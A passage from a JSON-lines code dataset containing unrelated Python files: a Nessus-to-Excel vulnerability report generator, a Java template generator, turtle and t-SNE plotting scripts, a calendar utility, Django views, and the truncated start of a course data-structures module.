vulnerabilite et la sauvegarde du fichier\ndef excelfiche(filepath, template, vulnstruct, listcriticite, typeF, interfacecount):\n\tflag = False\n\ttemplate_source_sheet = template[\"Fiche Vulns MASTER\"]\n\tvulncount = {\"Info\": 0, \"Faible\": 0, \"Moyenne\": 0, \"Haute\": 0, \"Critique\": 0}\n\tfor currentVuln in vulnstruct:\n\t\tif (listcriticite[int(currentVuln.criticite)] == 1) and (currentVuln.typevuln == typeF):\n\t\t\taddedstring=\"\"\n\t\t\tremovedstring=\"\"\n\t\t\tenvstring = \"\"\n\t\t\tflag = True\t\t\n\t\t\tvulnsheet = template.create_sheet(currentVuln.hashtag)\n\t\t\tinstance = openpyxl.worksheet.copier.WorksheetCopy(template_source_sheet, vulnsheet)\n\t\t\topenpyxl.worksheet.copier.WorksheetCopy.copy_worksheet(instance)\n\t\t\tvulnsheet[\"A2\"] = currentVuln.hashtag\n\t\t\tvulnsheet[\"B2\"] = currentVuln.name\n\t\t\tvulnsheet[\"C2\"] = convert_criticite(str(currentVuln.criticite))\n\t\t\tvulncount[convert_criticite(str(currentVuln.criticite))] = vulncount[convert_criticite(str(currentVuln.criticite))]+1\n\t\t\tcolour = get_criticite_color(convert_criticite(str(currentVuln.criticite)))\n\t\t\tvulnsheet[\"C2\"].fill = openpyxl.styles.PatternFill(start_color= colour, end_color= colour, fill_type=\"solid\")\n\t\t\tenvstring = nessusdump.getstringip(currentVuln.environnement+currentVuln.environnementadded, True, listcriticite[7])\n\t\t\tif envstring == \"\":\n\t\t\t\tvulnsheet[\"A4\"] = nessusdump.getstringip(currentVuln.environnementadded, True, listcriticite[7])\n\t\t\t\tvulnsheet[\"A6\"] = currentVuln.description\n\t\t\telse:\n\t\t\t\tvulnsheet[\"A4\"] = nessusdump.getstringip(currentVuln.environnement+currentVuln.environnementadded, True, listcriticite[7])\n\t\t\t\tif len(currentVuln.environnementadded) > 0:\n\t\t\t\t\tif currentVuln.environnement != currentVuln.environnementadded:\n\t\t\t\t\t\taddedstring = \"Ajout :\\n\"+nessusdump.getstringip(currentVuln.environnementadded, True, listcriticite[7])+\"\\n\\n\"\n\t\t\t\tif len(currentVuln.environnementremoved) > 0:\n\t\t\t\t\tremovedstring = 
\"Retrait :\\n\"+nessusdump.getstringip(currentVuln.environnementremoved, True, listcriticite[7])+\"\\n\\n\"\n\t\t\t\tvulnsheet[\"A6\"] = addedstring+removedstring+currentVuln.description\n\t\t\tvulnsheet[\"A8\"] = currentVuln.impact\n\t\t\tvulnsheet[\"A10\"] = currentVuln.recommendation\n\t\t\tvulnsheet[\"A12\"] = currentVuln.reference\n\t\t\tvulnsheet.sheet_properties.tabColor = colour\n\tif not flag:\n\t\tif typeF == \"External\":\n\t\t\ttemplate.save(filepath.name.split('.xlsx')[0]+\"_\"+typeF+\".xlsx\")\n\t\treturn\n\tgraph_sheet = template[\"Graph\"]\n\tif typeF == \"External\":\n\t\tgraph_sheet[\"C17\"] = interfacecount[\"admin_web\"]\n\t\tgraph_sheet[\"C18\"] = interfacecount[\"admin_infra\"]\n\t\tgraph_sheet[\"C19\"] = interfacecount[\"api_web\"]\n\t\tgraph_sheet[\"C20\"] = interfacecount[\"bdd\"]\n\n\tgraph_sheet[\"C28\"] = vulncount[\"Critique\"]\n\tgraph_sheet[\"C29\"] = vulncount[\"Haute\"]\n\tgraph_sheet[\"C30\"] = vulncount[\"Moyenne\"]\n\tgraph_sheet[\"C31\"] = vulncount[\"Faible\"]\n\tif vulnstruct != None:\n\t\tgraph_sheet[\"B35\"] = u\"Moyenne jours patch pour les vulnérabilités critique et \\xE9lev\\xE9e\"\n\t\tgraph_sheet [\"C35\"] = datepatchaverage(vulnstruct)\n\tdel template[\"Fiche Vulns MASTER\"]\n\tif typeF == \"Internal\":\n\t\tdel template[\"Hacker's View\"]\n\ttemplate.save(filepath.name.split('.xlsx')[0]+\"_\"+typeF+\".xlsx\")\n\n## Fonction getinfoexcel\n# @param path Path du fichier Excel\n# @return Liste de structure fiche\n# Fonction permettant de retrouver les informations sur les vulnerabilites dans un Excel\ndef getinfoexcel(path):\n\tfileexcel = load_workbook(path)\n\tlistvuln = []\n\t\n\tfor currentsheet in fileexcel.get_sheet_names():\n\t\tif \"V-\" not in currentsheet:\n\t\t\tcontinue\n\t\tstartarray = 1\n\t\tws = fileexcel.get_sheet_by_name(name = currentsheet)\n\t\twhile True:\n\t\t\ttest = \"A\"+str(startarray)\n\t\t\tif ws[test].value == \"#\":\n\t\t\t\tstartarray = startarray+1\n\t\t\t\tbreak\n\t\t\tstartarray = startarray+1\n\t\tmyVuln = nessusdump.fichevuln()\n\t\tmyVuln.hashtag = ws[\"A\"+str(startarray)].value\n\t\tmyVuln.name = ws[\"B\"+str(startarray)].value\n\t\tmyVuln.criticite = ws[\"C\"+str(startarray)].value\n\t\tposition = 0\n\t\tfor currentdetail in ws[\"A\"+str(startarray+1)].value.split(\"\\n\"):\n\t\t\tif currentdetail==\"\":\n\t\t\t\tcontinue\n\t\t\tif checkkeywords(currentdetail):\n\t\t\t\tposition = checkkeywords(currentdetail)\n\t\t\telse:\n\t\t\t\tif position == 1:\n\t\t\t\t\tif myVuln.environnement == \"\": \n\t\t\t\t\t\tmyVuln.environnement = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.environnement = myVuln.environnement+', '+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 2:\n\t\t\t\t\tif myVuln.description == \"\": \n\t\t\t\t\t\tmyVuln.description = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.description = myVuln.description+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 3:\n\t\t\t\t\tif myVuln.impact == \"\": \n\t\t\t\t\t\tmyVuln.impact = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.impact = myVuln.impact+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 4:\n\t\t\t\t\tif myVuln.recommendation == \"\": \n\t\t\t\t\t\tmyVuln.recommendation = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.recommendation = myVuln.recommendation+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 
5:\n\t\t\t\t\tif myVuln.reference == \"\": \n\t\t\t\t\t\tmyVuln.reference = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.reference = myVuln.reference+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\tlistvuln.append(myVuln)\n\treturn listvuln\n\n## Fonction checkkeywords\n# @param currentline Ligne courante dans le fichier Excel\n# @return Vrai ou Faux\n# Fonction permettant de savoir si l un des mots est present dans la ligne courante\ndef checkkeywords(currentline):\n\tkeywords = [\"Environnement(s) vuln\", \"Description\", \"Impact potentiel\", \"Recommandation(s)\", \"rence(s)\"]\n\tindex = 0\n\tfor currentwords in keywords:\n\t\tif currentwords in currentline:\n\t\t\tindex = index+1\n\t\t\treturn index\n\t\tindex = index+1\n\treturn False\n\n## Fonction checkstringsize\n# @param wantcheck Chaine a verifier\n# @param Taille de l ancienne chaine\n# @return La plus grande taille\n# Fonction permettant de savoir quelle chaine de caractere est la plus grande\ndef checkstringsize(wantcheck, previoussize):\n\tif previoussize < wantcheck.count(''):\n\t\treturn int(wantcheck.count(''))\n\treturn previoussize\n\n## Fonction convert_criticite\n# @param criticite Numero de la criticite\n# @return Valeur de la criticite en mot\n# Fonction permettant de convertir un numero de criticite en mot\ndef convert_criticite(criticite):\n\tif criticite == '0':\n\t\treturn \"Info\"\n\telif criticite == '1':\n\t\treturn \"Faible\"\n\telif criticite == '2':\n\t\treturn \"Moyenne\"\n\telif criticite == '3':\n\t\treturn \"Haute\"\n\telse:\n\t\treturn \"Critique\"\n\n## Fonction convert_string_criticite\n# @param criticite String de la criticite\n# @return Valeur de la criticite en chiffre\n# Fonction permettant de convertir une string de criticite en chiffre\ndef convert_string_criticite(criticite):\n\tif criticite == \"Info\":\n\t\treturn 0\n\telif criticite == \"Faible\":\n\t\treturn 1\n\telif criticite == \"Moyenne\":\n\t\treturn 2\n\telif criticite == \"Haute\":\n\t\treturn 3\n\telse:\n\t\treturn 4\n\n## Fonction get_criticite_color\n# @param criticite Nom de la criticite\n# @return Couleur en code HEX\n# Fonction permettant de connaitre la couleur associee a une criticite\ndef get_criticite_color(criticite):\n\tif criticite == \"Info\":\n\t\treturn \"0000cd\"\n\telif criticite == \"Faible\":\n\t\treturn \"6ead00\"\n\telif criticite == \"Moyenne\":\n\t\treturn \"e9dc00\"\n\telif criticite == \"Haute\":\n\t\treturn \"ff0000\"\n\telse:\n\t\treturn \"a40000\"\n\n## Fonction getlineIP\n# @param ip Ips recherchees\n# @param listStructHost List des hosts\n# @return Liste de lignes\n# Fonction permettant de recuperer la line des IP pour le fichier excel\ndef getlineIP(ip, listStructHost):\n\tlistline = []\n\tcompt = 0\n\tfor currentHost in listStructHost:\n\t\tif currentHost.ipAdress == ip:\n\t\t\tlistline.append(compt+START_LINE_TEMPLATE)\n\t\tcompt = compt+1\n\treturn listline\n\n\n## Fonction datepatchaverage\n# @param datelist Liste de vuln\n# @return Nombre de jour moyen\n# Fonction permettant de connaître l age moyen des patch pour les vulnerabilites critique et elevee\ndef datepatchaverage(vulnlist):\n\taverage = 0\n\tcount = 0\n\tfor current in vulnlist:\n\t\tif int(current.criticite) > 2:\n\t\t\tfor currentenv in current.environnement:\n\t\t\t\tfor currentplugin in currentenv.pluginid:\n\t\t\t\t\tcurrentdate = currentplugin.split(':')[3]\n\t\t\t\t\tif currentdate != \"00/00/0000\":\n\t\t\t\t\t\tcutcut = currentdate.split('/')\n\t\t\t\t\t\tdelta = date.today() - 
date(int(cutcut[0]), int(cutcut[1]), int(cutcut[2]))\n\t\t\t\t\t\taverage = average + int(str(delta).split(',')[0].split(' ')[0])\n\t\t\t\t\t\tcount = count+1\n\ttry:\n\t\treturn (average / count)\n\texcept ZeroDivisionError:\n\t\treturn 0\n\n\n## Fonction dumpipfqdn\n# @param filepath Chemin du fichier de destination\n# @param vulnlist Liste de vulnerabilite Nessus\n# Fonction permettant de sortir un fichier Excel permettant de connaitre la correspondance IP / FQDN\ndef dumpipfqdn(filepath, vulnlist):\n\tclass ipfqdn(object):\n\t\tdef __init__(self, iip, ffqdn):\n\t\t\tself._ip = iip\n\t\t\tself._fqdn = ffqdn\n\t\t@property\n\t\tdef ip(self):\n\t\t\treturn self._ip\n\t\t@property\n\t\tdef fqdn(self):\n\t\t\treturn self._fqdn\t\t\n\tlistipfqdn = []\n\tfor current in vulnlist:\n\t\tfor currentenv in current.environnement:\n\t\t\tif nessusdump.checkippresent(listipfqdn, currentenv.ip) == -1:\n\t\t\t\tnewipfqdn = ipfqdn(currentenv.ip, currentenv.fqdn)\n\t\t\t\tlistipfqdn.append(newipfqdn)\n\twb = Workbook()\n\tws = wb.active\n\tws.title = \"IP FQDN\"\n\tcount = 2\n\tws[\"A1\"] = \"IP\"\n\tws[\"B1\"] = \"FQDN\"\n\tfor current in listipfqdn:\n\t\tws[\"A\"+str(count)] = current.ip\n\t\tws[\"B\"+str(count)] = current.fqdn\n\t\tcount+=1\n\twb.save(filename = filepath)\n\n","sub_path":"csvdump.py","file_name":"csvdump.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45145688","text":"import shutil,os\nclass GenerationMain:\n listStr = [\"Controller\",\"Service\",\"Mapper\",\"Dao\",\"ServiceImpl\",\"Util\",\"Fegin\"]\n def __init__(self,className,package = ''):\n self.className = className\n self.package = package\n self.prefixU = className\n\n @property\n def prefixU(self):\n return self._prefixU\n @property\n def prefixL(self):\n return self._prefixL\n\n @prefixU.setter\n def prefixU(self,className):\n for endStr in GenerationMain.listStr:\n if(className.endswith(endStr)):\n self._prefixU = className[0:len(className)-len(endStr)]\n self._prefixL = self._prefixU[0].lower()+self._prefixU[1:len(self._prefixU)]\n break\n\n def generate(self):\n self.cleanOut()\n contents = self.getContents(True)\n contents = self.handleContents(contents)\n self.writeFile(contents,self.className)\n contents = self.getContents(False)\n contents = self.handleContents(contents)\n self.writeFile(contents,self.className+\"Test\")\n print(\"ok\")\n\n def writeFile(self,contents,fileName):\n with open(f'out/{fileName}.java','w',encoding='UTF-8') as file_object:\n file_object.write(contents)\n\n def handleContents(self,contents):\n contents = contents.replace(\"{prefixU}\",self.prefixU)\n contents = contents.replace(\"{prefixL}\",self.prefixL)\n contents = contents.replace(\"{package}\",self.package)\n contents = contents.replace(\"{className}\",self.className)\n contents = contents.replace(\"{classNameL}\",self.className[0].lower()+self.className[1:len(self.className)])\n return contents\n\n def getContents(self,test):\n if(self.className.endswith(\"Controller\")):\n if(test):\n fileName = 'controller_template'\n else:\n fileName = 'controller_test_template'\n else:\n if(test):\n fileName = 'other_template'\n else:\n fileName = 'other_test_template'\n with open(fileName,encoding='UTF-8') as file_object:\n contents = file_object.read()\n return contents\n\n def cleanOut(self):\n try:\n os.mkdir(\"out\")\n except FileExistsError:\n pass\n shutil.rmtree(\"out\")\n os.mkdir(\"out\")\n\nif __name__ == '__main__':\n m = 
GenerationMain(\"TestController\",\"com.hcfc.accounting.service\")\n m.generate()\n","sub_path":"python/generate_code.py","file_name":"generate_code.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47036300","text":"#circleSpiral.py\nimport turtle\nt = turtle.Pen()\nt.speed(0)\ncircles = int(turtle.numinput(\"number of circles\",\"how many circles would you like me to draw?\",6))\nfor x in range(circles):\n t.circle(80)\n t.left(360/circles)\n t.right(x)\n \n","sub_path":"test circle Spiral.py","file_name":"test circle Spiral.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"448795352","text":"import logging\n\nfrom datetime import datetime\nfrom collections import defaultdict\n\nfrom application.models import AdultInHome\nfrom application.utils import get_id\nfrom application.views.PITH_views.base_views.PITH_template_view import PITHTemplateView\nfrom application.business_logic import find_dbs_status, DBSStatus\n\n\n# Initiate logging\nlog = logging.getLogger('')\n\n\nclass PITHDBSPostOrApplyView(PITHTemplateView):\n\n template_name = 'PITH_templates/PITH_DBS_post_or_apply.html'\n success_url = 'PITH-Children-Check-View'\n\n def get_context_data(self, **kwargs):\n\n application_id = get_id(self.request)\n\n adult_lists = defaultdict(list)\n\n for adult, dbs_status in self.get_adults_requiring_dbs_action(application_id):\n\n adult_lists['{}_list'.format(dbs_status.name.lower())].append(adult)\n\n kwargs.update(adult_lists)\n\n return super().get_context_data(**kwargs)\n\n def get_adults_requiring_dbs_action(self, application_id):\n \"\"\"\n Gets the list of adults in the home associated with this application that need to\n take further action to complete their DBS check\n :param application_id:\n :return: List of 2-tuples containing the adult model and their DBSStatus\n \"\"\"\n\n adults = AdultInHome.objects.filter(application_id=application_id)\n filtered = []\n for adult in adults:\n\n dbs_status = find_dbs_status(adult, adult)\n\n if dbs_status in (DBSStatus.NEED_APPLY_FOR_NEW,\n DBSStatus.NEED_UPDATE_SERVICE_SIGN_UP,\n DBSStatus.NEED_UPDATE_SERVICE_CHECK):\n filtered.append((adult, dbs_status))\n\n return filtered\n","sub_path":"application/views/PITH_views/PITH_DBS_post_or_apply.py","file_name":"PITH_DBS_post_or_apply.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621109034","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use('TkAgg')\nfrom sklearn.manifold import TSNE\n\n\n\ndef plot_embedding(data, label, title):\n\n fig = plt.figure()\n ax = plt.subplot(111)\n type1_x = []\n type1_y = []\n type2_x = []\n type2_y = []\n type3_x = []\n type3_y = []\n type4_x = []\n type4_y = []\n type5_x = []\n type5_y = []\n type6_x = []\n type6_y = []\n type7_x = []\n type7_y = []\n type8_x = []\n type8_y = []\n type9_x = []\n type9_y = []\n type10_x = []\n type10_y = []\n\n\n for i in range(data.shape[0]):\n if label[i] == 0:\n type1_x.append(data[i][0])\n type1_y.append(data[i][1])\n if label[i] == 1:\n type2_x.append(data[i][0])\n type2_y.append(data[i][1])\n if label[i] == 2:\n type3_x.append(data[i][0])\n type3_y.append(data[i][1])\n if label[i] == 3:\n type4_x.append(data[i][0])\n type4_y.append(data[i][1])\n if label[i] == 4:\n 
type5_x.append(data[i][0])\n type5_y.append(data[i][1])\n if label[i] == 5:\n type6_x.append(data[i][0])\n type6_y.append(data[i][1])\n if label[i] == 6:\n type7_x.append(data[i][0])\n type7_y.append(data[i][1])\n if label[i] == 7:\n type8_x.append(data[i][0])\n type8_y.append(data[i][1])\n if label[i] == 8:\n type9_x.append(data[i][0])\n type9_y.append(data[i][1])\n if label[i] == 9:\n type10_x.append(data[i][0])\n type10_y.append(data[i][1])\n\n\n color = plt.cm.Set3(0)\n color = np.array(color).reshape(1, 4)\n color1 = plt.cm.Set3(1)\n color1 = np.array(color1).reshape(1, 4)\n color2 = plt.cm.Set3(2)\n color2 = np.array(color2).reshape(1, 4)\n color3 = plt.cm.Set3(3)\n color3 = np.array(color3).reshape(1, 4)\n\n type1 = plt.scatter(type1_x, type1_y, s=10, c='#377EB8')\n type2 = plt.scatter(type2_x, type2_y, s=10, c='#66C2A5')\n type3 = plt.scatter(type3_x, type3_y, s=10, c='#FF6C91')\n type4 = plt.scatter(type4_x, type4_y, s=10, c='#FF7400')\n type5 = plt.scatter(type5_x, type5_y, s=10, c='#00A13B')\n type6 = plt.scatter(type6_x, type6_y, s=10, c='#D62728')\n type7 = plt.scatter(type7_x, type7_y, s=10, c='#A38CF4')\n type8 = plt.scatter(type8_x, type8_y, s=10, c='#F461DD')\n type9 = plt.scatter(type9_x, type9_y, s=10, c='#FFD92F')\n type10 = plt.scatter(type10_x, type10_y, s=10, c='#8C564B')\n\n mapping = {'Financial': 0.0,\n 'Tools': 1.0,\n 'Messaging': 2.0,\n 'eCommerce': 3.0,\n 'Payments': 4.0,\n 'Social': 5.0,\n 'Enterprise': 6.0,\n 'Mapping': 7.0,\n 'Science': 8.0,\n 'Government': 9.0}\n plt.legend((type1, type2, type3, type4, type5, type6, type7, type8, type9, type10),\n ('Financial', 'Tools', 'Messaging', 'eCommerce', 'Payments', 'Social', 'Enterprise', 'Mapping', 'Science', 'Government'),\n loc=(0.97, 0.5))\n\n # plt.xticks()\n # plt.yticks()\n # plt.title(title)\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n ax.spines['right'].set_visible(False) # 去除右边框\n ax.spines['top'].set_visible(False) # 去除上边框\n return fig\n\ndef plot_2D(data, label, file_name):\n #n_samples, n_features = data.shape\n print('Computing t-SNE embedding')\n tsne = TSNE(n_components=2, init='pca', random_state=2019, perplexity=50, learning_rate=100, n_iter=2000,) #使用TSNE对特征降到二维\n #t0 = time()\n result = tsne.fit_transform(data) #降维后的数据\n #print(result.shape)\n #画图\n fig = plot_embedding(result, label,\n 't-SNE embedding of the digits (time %.2fs)')\n #% (time() - t0))\n fig.subplots_adjust(right=0.8) #图例过大,保存figure时无法保存完全,故对此参数进行调整\n fig.savefig(file_name,dpi=500)\n","sub_path":"utils/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423101656","text":"from django.shortcuts import render\nfrom django.shortcuts import get_list_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import *\nfrom django.db.models import Q\n\n \n# Get the Module List\nclass testmodule(APIView):\n def get(self, request):\n code = request.META.get('HTTP_SECURITYCODE', None)\n role = request.META.get('HTTP_ROLE', None)\n try:\n securitytoken = tbl_AccountInfo.objects.get(securitycode=code)\n except tbl_AccountInfo.DoesNotExist:\n return Response({\"Error\":\"Invalid Security Token\"}, status=status.HTTP_404_NOT_FOUND)\n \n if role == 'Admin' or role == 'Owner' or role == 'Manager':\n totalproducttask = tbl_ProductRequest.objects.count()\n appproducttask = 
tbl_ProductRequest.objects.filter(status='Approved').count()\n pendproducttask = tbl_ProductRequest.objects.filter(status='Pending').count()\n archproducttask = tbl_ProductRequest.objects.filter(status='Archive').count()\n scheduleproducttask = tbl_ProductRequest.objects.filter(~Q(assignto='Not Scheduled')).count()\n unscheduleproducttask = tbl_ProductRequest.objects.filter(assignto='Not Scheduled').count()\n totalsoptask = tbl_SOPAudit.objects.count()\n appsoptask = tbl_SOPAudit.objects.filter(status='Approved').count()\n pendsoptask = tbl_SOPAudit.objects.filter(status='Pending').count()\n archsoptask = tbl_SOPAudit.objects.filter(status='Archive').count()\n schedulesoptask = tbl_SOPAudit.objects.filter(~Q(assignto='Not Scheduled')).count()\n unschedulesoptask = tbl_SOPAudit.objects.filter(assignto='Not Scheduled').count()\n totalaudit = tbl_Aud_Auditdetails.objects.count()\n compaudit = tbl_Aud_Auditdetails.objects.filter(score='100%').count()\n incompaudit = tbl_Aud_Auditdetails.objects.filter(~Q(score='100%')).count()\n totalaction = tbl_Aud_Actiondetails.objects.count()\n compaction = tbl_Aud_Actiondetails.objects.filter(actionstatus='Done').count()\n incompaction = tbl_Aud_Actiondetails.objects.filter(~Q(actionstatus='Done')).count()\n totalcontacts = tbl_um_ContactDetails.objects.count()\n activecontacts = tbl_um_ContactDetails.objects.filter(userstatus='Active').count()\n inactivecontacts = tbl_um_ContactDetails.objects.filter(~Q(userstatus='Active')).count()\n totalaccount = tbl_um_AccountDetails.objects.count()\n activeaccount = tbl_um_AccountDetails.objects.filter(accountstatus='Active').count()\n inactiveaccount = tbl_um_AccountDetails.objects.filter(~Q(accountstatus='Active')).count()\n totaltemp = tbl_Chk_Templatedetails.objects.count()\n unassingedtemp = tbl_Chk_Templatedetails.objects.filter(taskname='Not Assigned').count()\n assingedtemp = tbl_Chk_Templatedetails.objects.filter(~Q(taskname='Not Assigned')).count()\n return Response({\"TotalProductTask\": totalproducttask, \"ApprovedProductTask\": appproducttask, \n \"PendingProducttask\": pendproducttask, \"archproducttask\": archproducttask, \"scheduleproducttask\": scheduleproducttask, \n \"unscheduleproducttask\": unscheduleproducttask, \"totalsoptask\": totalsoptask, \"appsoptask\": appsoptask, \n \"pendsoptask\": pendsoptask, \"archsoptask\": archsoptask, \"schedulesoptask\": schedulesoptask, \"unschedulesoptask\": unschedulesoptask, \n \"totalaudit\": totalaudit, \"compaudit\": compaudit, \"incompaudit\": incompaudit, \n \"totalaction\": totalaction, \"compaction\": compaction, \"incompaction\": incompaction, \n \"totalcontacts\": totalcontacts, \"activecontacts\": activecontacts, \"inactivecontacts\": inactivecontacts, \n \"totalaccount\": totalaccount, \"activeaccount\": activeaccount, \"inactiveaccount\": inactiveaccount, \n \"totaltemp\": totaltemp, \"unassingedtemp\": unassingedtemp, \"assingedtemp\": assingedtemp}, status=status.HTTP_200_OK)\n elif role == 'Template Creator':\n totaltemp = tbl_Chk_Templatedetails.objects.count()\n unassingedtemp = tbl_Chk_Templatedetails.objects.filter(taskname='Not Assigned').count()\n assingedtemp = tbl_Chk_Templatedetails.objects.filter(~Q(taskname='Not Assigned')).count()\n return Response({\"totaltemp\": totaltemp, \"unassingedtemp\": unassingedtemp, \"assingedtemp\": assingedtemp}, status=status.HTTP_200_OK)\n elif role == 'Schedular':\n totalproducttask = tbl_ProductRequest.objects.count()\n scheduleproducttask = tbl_ProductRequest.objects.filter(~Q(assignto='Not 
Scheduled')).count()\n unscheduleproducttask = tbl_ProductRequest.objects.filter(assignto='Not Scheduled').count()\n totalsoptask = tbl_SOPAudit.objects.count()\n schedulesoptask = tbl_SOPAudit.objects.filter(~Q(assignto='Not Scheduled')).count()\n unschedulesoptask = tbl_SOPAudit.objects.filter(assignto='Not Scheduled').count()\n return Response({\"TotalProductTask\": totalproducttask, \"scheduleproducttask\": scheduleproducttask, \n \"unscheduleproducttask\": unscheduleproducttask, \"totalsoptask\": totalsoptask, \"schedulesoptask\": schedulesoptask, \"unschedulesoptask\": unschedulesoptask}, status=status.HTTP_200_OK)\n elif role == 'Auditor' or role == 'Client':\n totalaudit = tbl_Aud_Auditdetails.objects.count()\n compaudit = tbl_Aud_Auditdetails.objects.filter(score='100%').count()\n incompaudit = tbl_Aud_Auditdetails.objects.filter(~Q(score='100%')).count()\n totalaction = tbl_Aud_Actiondetails.objects.count()\n compaction = tbl_Aud_Actiondetails.objects.filter(actionstatus='Done').count()\n incompaction = tbl_Aud_Actiondetails.objects.filter(~Q(actionstatus='Done')).count()\n return Response({ \"totalaudit\": totalaudit, \"compaudit\": compaudit, \"incompaudit\": incompaudit, \n \"totalaction\": totalaction, \"compaction\": compaction, \"incompaction\": incompaction}, status=status.HTTP_200_OK)","sub_path":"Dashboard_App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"40231004","text":"\n\nfrom xai.brain.wordbase.nouns._fencer import _FENCER\n\n#calss header\nclass _FENCERS(_FENCER, ):\n\tdef __init__(self,): \n\t\t_FENCER.__init__(self)\n\t\tself.name = \"FENCERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fencer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fencers.py","file_name":"_fencers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"406296001","text":"import sys\nimport calendar\nfrom datetime import datetime\n\ndt = datetime.today()\nuser_input = sys.argv\nerror = '\\nThis calendar takes a maximum of two arguments: month and year.\\nPlease enter them in numerical format eg: 01 2017\\n'\n\n\ndef print_calendar(year, month):\n print(f'\\n{calendar.month(year, month)}\\n')\n sys.exit()\n\n# Function to check input can be coerced into integer\ndef isValid(value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n# Check user inputs exist, sanitize and proceed. If no user input, use datetime. 
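The dashboard view above counts complements with negated Q objects; for a single predicate, exclude() is the equivalent and usually more readable form. A sketch against the same tbl_ProductRequest model, assuming the app's models are importable as in the view module:

from django.db.models import Q
from .models import tbl_ProductRequest  # as star-imported in the view module

total = tbl_ProductRequest.objects.count()
unscheduled = tbl_ProductRequest.objects.filter(assignto='Not Scheduled').count()
scheduled = tbl_ProductRequest.objects.filter(~Q(assignto='Not Scheduled')).count()
# Equivalent for a single condition, without Q:
scheduled_alt = tbl_ProductRequest.objects.exclude(assignto='Not Scheduled').count()
assert scheduled == scheduled_alt == total - unscheduled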
\nif len(user_input) == 1:\n month = dt.month\n year = dt.year\nelif len(user_input) == 2:\n if isValid(user_input[1]) and int(user_input[1]) < 13:\n month = int(user_input[1])\n year = dt.year\n else:\n print(error)\n sys.exit()\nelif len(user_input) == 3:\n if isValid(user_input[1]) and isValid(user_input[2]):\n month = int(user_input[1])\n year = int(user_input[2])\n else:\n print(error)\n sys.exit()\nelse:\n print(error)\n sys.exit()\n\nprint_calendar(year, month)\n","sub_path":"src/14_cal.py","file_name":"14_cal.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"156284418","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación, Universidad de Los Andes\n * \n * Contribución de:\n *\n * Cristian Camilo Castellanos\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n\nimport config as cf\nimport sys\nimport csv\n\nfrom ADT import list as lt\nfrom DataStructures import listiterator as it\nfrom DataStructures import liststructure as lt\nfrom Sorting import shellsort as sh\nfrom Sorting import selectionsort as sel \nfrom Sorting import insertionsort as ins \nfrom time import process_time \n\ndef printMenu():\n \"\"\"\n Imprime el menu de opciones\n \"\"\"\n print(\"\\nBienvenido\")\n print('1- Cargar Datos')\n print(\"2- Ranking de peliculas\")\n print(\"3- Conocer un director\")\n print(\"4- Conocer un actor\")\n print(\"5- Entender un genero\")\n print(\"6- Crear ranking\")\n print(\"7- Mostrar datos por director\")\n print(\"0- Salir\")\n\ndef lessfunction(element1, element2, criteria):\n if float(element1[criteria]) < float(element2[criteria]):\n return True\n return False\n\ndef greaterfunction(element1, element2, criteria):\n if float(element1[criteria]) > float(element2[criteria]):\n return True\n return False\n\ndef compareRecordIds():\n pass\n\ndef loadCSVFile (file1, file2, sep=\";\"):\n \"\"\"\n Carga un archivo csv a una lista\n Args:\n file\n Archivo csv del cual se importaran los datos\n sep = \";\"\n Separador utilizado para determinar cada objeto dentro del archivo\n Try:\n Intenta cargar el archivo CSV a la lista que se le pasa por parametro,\n si encuentra algun error\n Borra la lista e informa al usuario\n Returns: None \n \"\"\"\n 